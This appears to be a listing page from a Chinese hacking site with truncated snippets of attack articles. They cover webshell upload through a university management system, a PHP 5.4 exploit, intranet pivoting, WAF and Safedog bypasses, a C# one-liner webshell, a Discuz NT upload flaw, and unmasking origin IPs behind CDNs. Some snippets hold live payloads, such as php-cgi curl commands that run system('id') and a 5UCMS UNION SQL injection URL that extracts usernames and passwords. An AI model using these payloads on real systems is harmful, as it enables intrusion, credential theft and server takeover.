快速找到windows2003系统下是哪个网站发包
可以在本站查找phpddos解决方案 首先是看本地连接的收包和发包量,排除服务器被黑的情况, 然后打开C:\WINDOWS\system32\LogFiles\HTTPERR ,找到最新的一个iis日志, 然后ctrl+F 搜索port=如果出现“port= ”关键词,然后看后面会有一串数字, 这串数字是网站的标识符,这样就可以直接看到是哪个站点流量高了,直接关闭即可
关于“高校现代教学管理系统漏洞”的攻击与防范
作者:Blackeagle 转载文章请保留版权www.blackeagle.name QQ空间和博客同时首发 前段时间在群里看到一哥们分享了一个“高校现代教学管理系统漏洞”,方法很简单,很快就能拿到webshell。 原理和fck差不多,也是利用上传功能。 ftb.imagegallery.aspx 这是一个具有上传功能的目录,添加在该网站域名后即可打开。 之后上传带有可解析的asp马(需要解析改...
PHP 5.4 (5.4.3) Code Execution (Win32)
// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32) // Exploit author: 0in (Maksymilian Motyl) // Email: 0in(dot)email(at)gmail.com // * Bug with Variant type parsing originally discovered b...
渗透内网方法之巧用代理
代理在入侵里的作用-----妙用代理,渗透内网 一、踩点 主机: https://www.webshell.cc OS:Windows 2000 + IIS 5.0 + MSSQL 端口:80 21i 数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网. 首页存在注入漏洞,sa登陆. 注入点: https://www.webshell.cc/...
如何绕过D盾进行注入
少壮不努力,长大遇啊D ----某大黑客 D盾有多不爽我就不说了,现在都是批量注入,时不时的弹出D盾提示,甚是恼人。。。。。 其实这个并不是我发现的,而是国外的一个注入工具。某日本人心血来潮,想换一个linux系统玩玩儿,在互联网上逛了一大圈,发现大半都是带马的网站,甚是不爽,准备关闭、突然一个字眼吸引了我,没错,那就是Anonymous_os,看了下简介说是匿名者做的一个linux内核的操作系统...
获取使用CDN网站的真实IP
现在很多网站用了cdn技术,在做一些测试的时候,想获取其服务器真实IP地址就有点困难,不知道现在还有其他什么好的方法呢,整理了下,目前知道如下两种: 1:拿CDN服务器 找出真实IP cache_peer 1.1.1.1 parent 80 0 no-query originserver cache_peer_domain 1.1.1.1 www.xxxx.com 2:判断HTTP_X_FORWA...
可突破安全狗的aspx一句话
在看一个站的时候,发现服务器装了安全狗,刚开始利用IIS6的畸形解析一直被拦截,最后找到了不用畸形解析的办法,传了菜刀的一句话,却连不上,一直返回403,应该是被拦截,后来找了个相对比较生僻的一句话,终于上传并连接成功。 服务端一句话木马: <%@ Page Language="C#" ValidateRequest="false" %> <%try{ System.Reflec...
php-cgi漏洞利用EXP
1、本地包含直接执行代码: curl -H "USER-AGENT: <?system('id');die();?>" https://www.webshell.cc/test.php?-dauto_prepend_file%3d/proc/self/environ+-n 2、远程包含执行代码: curl https://www.webshell.cc/test.php?-d...
无忧无忧网络文章管理系统(5UCMS)注入漏洞
后台地址:admin/Login.asp 数据库路径:inc/db 目录下 漏洞地址:admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26pas...
Discuz NT 多个版本文件上传漏洞
文章作者:rebeyond 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。 受影响版本:貌似都受影响。 漏洞文件:tools/ajax.aspx 漏洞分析:这个页面里的ajax请求,都没有进行权限的验证,游客权限就可以调用其中的所有方法,...